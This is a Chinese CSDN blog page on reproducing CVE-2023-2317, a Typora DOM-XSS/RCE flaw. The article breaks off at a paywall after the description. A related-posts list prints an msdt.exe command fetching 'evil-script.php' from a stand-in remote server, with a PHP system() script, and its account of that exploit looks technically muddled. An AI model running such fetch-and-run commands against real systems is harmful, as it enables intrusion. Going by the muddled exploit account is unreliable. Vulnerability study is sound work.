CVE-2023-2317:Typora 远程代码执行漏洞复现

已于 2023-09-06 09:38:44 修改
阅读量471 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 系统安全 web安全 网络安全
于 2023-09-06 09:33:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/132695362
版权

Typora 远程代码执行漏洞(CVE-2023-2317)

0x01 前言

本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!

0x02 漏洞描述

Typora是一款 Markdown 编辑器和阅读器。

Typora 1.6.7之前版本存在安全漏洞,Windows 和 Linux 版本 1.6.7 之前的 Typora 中的 updater/update.html 中存在基于 DOM 的 XSS,该漏洞允许通过加载特制的 markdown 文件从而使得执行任意 JavaScript 代码。如果用户打开恶意 markdown 文件或者从恶意网页复制文本并将其粘贴到 Typora,通过在<embed>标签中引用 update.html,则可以利用此漏洞,此外,攻击者可以使用特权接口 reqnode 访问节点模块 child_process 并执行任意系统命令。总的来说该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。

0x03 影响范围

version <=1.6.7

0x04 漏洞环境

1.下载部署有漏洞版本环境,这里下载部署版本为Typora

了解本专栏 订阅专栏 解锁全文 超级会员免费看
gaynell
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2022-22965:Spring远程代码执行漏洞复现
xjh8023的博客
11-09 444
CVE-2022-22965:Spring远程代码执行漏洞复现&getshell骚操作
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
Typora 远程代码执行漏洞(CVE-2023-2317)
qq_42751192的博客
08-29 1275
Typora 是一款由 Abner Lee 开发的轻量级 Markdown 编辑器,与其他 Markdown 编辑器不同的是,Typora 没有采用源代码和预览双栏显示的方式,而是采用所见即所得的编辑方式,实现了即时预览的功能,但也可切换至源代码编辑模式。
Typora-1.5.8+补丁
09-15
资源含Typora1.5.8安装包和pj补丁
GeoServer SQL 注入漏洞复现CVE-2023-25157)附poc_geoserverl漏洞(1)
最新发布
2401_84240129的博客
05-16 507
在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码
Typora安装使用
Java笔记
06-10 1855
SM.MS网络不稳定不建议使用,推荐使用【七牛云】进行储存。
notepad++堆缓冲区溢出漏洞CVE-2023-40031分析与复现
m0_61101264的博客
10-05 396
在转换时,重新计算转换后的内容的大小,计算公式为newSize = len + len / 2 + 1,len为转换前内容的大小,也就是新大小比原大小的3/2倍还多1个字节。常见的思路是利用该漏洞修改相邻堆大小造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据,这在CTF比赛中比较常见。综上,当poc文件大小为奇数,在进行UTF-16到UTF-8转化时,计算转化后缓冲区大小将发生错误,同时对文件内容的结束位置也判断错误,导致转化后堆缓冲区溢出一个字节,覆盖其他内存,可能导致任意代码执行
DHCP服务远程代码执行漏洞CVE-2023-28231分析及PoC
2301_77732591的博客
04-25 825
分析这类网络协议漏洞,很大一部分帮助来源于Wireshark对数据包的自动分析。它帮助我们理解协议结构以及基本的数据包错误原因和位置。虽然各个系统平台对于同一种协议都有自己的实现方式和处理逻辑,但他们在传输过程中,都遵循同样的标准。另一方面,另一个分析该漏洞的关键在于偶然获取的DHCP服务器对恶意DHCP服务其检查功能。它提供了最原始的参照数据包以及DHCPv6服务可以接收广播消息的事实。这也提示我们该漏洞的确可以以非授权无交互的条件去触发。
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
typora1.5.8安装包+安装教程
08-09
typora安装包
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 ...
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
本文将深入探讨一个与二进制分析工具相关的安全事件,即"CVE-2022-4510:Binwalk 远程代码执行漏洞"。Binwalk是一款广泛使用的开源工具,主要用于固件分析、逆向工程和提取嵌入式系统的固件图像。这个漏洞可能导致...
[漏洞分析] CVE-2023-38545 curl“史上最严重的漏洞“分析
Breeze的博客
10-13 4901
分析与复现curl"史上最严重漏洞"CVE-2023-38545
CVE-2023-38831漏洞复现过程(Winrar漏洞
weixin_47948655的博客
10-08 335
CVE-2023-38831漏洞复现过程(Winrar漏洞
Typora-远程命令执行漏洞复现-CVE-2023-2317
apple_52661176的博客
08-31 281
Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞,具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件,来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件,或者从一个恶意网页复制文本并将其粘贴到Typora中,那么攻击者可以通过在<embed>标签中引用update.html来利用这个漏洞
CVE-2023–22809漏洞利用|复现
Musda的博客
06-22 662
首先需要检查sudoedit版本此漏洞的利用范围仅限于。
Typora新手指南(常见操作)
CS@zeny的博客
11-14 4171
新手指南 如何使用Typora 1.1 段落分级 #表示一级标题 ##表示二级标题 ###表示三级标题 以此类推 或者也可以在段落中选择几级标题(先选中文字,再在段落中选择几级标题) 注意:加#号后必须加空格,才能有段落分级,其他的也是,需要用空格分开 1.2 列表 列表用-加空格,显示无序号列表 如果要嵌套的话加Tab键,就会有缩进 有序号列表 序号+. 加空格 然后加enter键,下面的就自动加序号 如果先缩进下级列表,可以加Tab键 还可以有序号和无序号混用 和上面
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值